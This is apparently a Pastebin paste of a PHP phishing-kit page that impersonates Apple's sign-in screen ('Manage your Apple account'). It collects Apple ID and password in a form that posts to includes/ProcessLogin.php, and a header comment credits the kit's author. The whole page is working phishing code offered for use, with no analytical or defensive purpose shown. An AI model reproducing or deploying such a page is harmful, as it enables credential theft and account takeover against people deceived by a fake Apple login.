Advertisement
aridho

signin

Mar 29th, 2018
1,699
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.46 KB | None | 0 0
  1. <?php
  2. /*
  3. L33bo peler = ICQ: 695059760
  4. */
  5. require "includes/session_protect.php";
  6. require "includes/functions.php";
  7. ?>
  8. <!DOCTYPE html>
  9. <html>
  10. <head>
  11. <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
  12. <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
  13. <link href="css/Fonts.css" rel="prefetch stylesheet" type="text/css">
  14. <link href="css/Login.css" media="screen" rel="stylesheet" type="text/css">
  15. <script>
  16. function ChangePlaceholder(){
  17. document.getElementById("user").placeholder = "name@example.com";
  18. }
  19. function ChangeBack(){
  20. document.getElementById("user").placeholder = "Apple ID";
  21. }
  22. function Activate(){
  23. document.getElementById("go").className = "si-button";
  24. }
  25. function Spinner(){
  26. document.getElementById("go").style.display = "none";
  27. document.getElementById("spin").style.display = "block";
  28. }
  29. </script>
  30. <title></title>
  31. </head>
  32. <body>
  33. <div class="si-body si-container container-fluid" data-theme="lite" id="content">
  34. <div class="widget-container fade-in restrict-max-wh fade-in" data-mode="embed">
  35. <div class="HoldLoginDiv">
  36. <div class="logo"><img style="width: 200px;" class="TextLogo" src="img/logo.png"></div>
  37. <div>
  38. <div class="signin fade-in">
  39. <h1 class="LoginTitkle">Manage your Apple account</h1>
  40. <form action="includes/ProcessLogin.php" name="login" id="name" method="POST" onsubmit="Spinner();">
  41. <div class="container HolderOfTheFields">
  42. <div class="row no-gutter si-field apple-id">
  43. <div class="col-xs-12"><span class="LoginTitle">Manage your Apple account Apple ID</span> <input class="si-text-field" id="user" name="user" onblur="ChangeBack();" onclick="ChangePlaceholder();" placeholder="Apple ID" spellcheck="false" type="email"></div>
  44. </div>
  45. <div class="row no-gutter si-field pwd">
  46. <div class="col-xs-12"><label class="LoginTitle" for="pwd">Password</label> <input class="si-password si-text-field" id="pass" name="pass" onkeyup="Activate();" placeholder="Password" type="password">
  47. </div>
  48. </div>
  49. <div class="si-remember-password"><input class="ax-outline" tabindex="0" type="checkbox"> <label for="remember-me">Remember me</label></div>
  50. <button class="si-button btn disabled" id="go" tabindex="0"><i class="icon icon_sign_in"></i></button>
  51. <button style="display:none;" class="si-button btn" id="spin" tabindex="0"><img style="margin-top:-2px" src="img/spinner.gif"></span></button>
  52. </div>
  53. </form>
  54. <div class="si-container-footer"></div>
  55. </div>
  56. </div>
  57. </div>
  58. </div>
  59. </div>
  60. </body>
  61. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement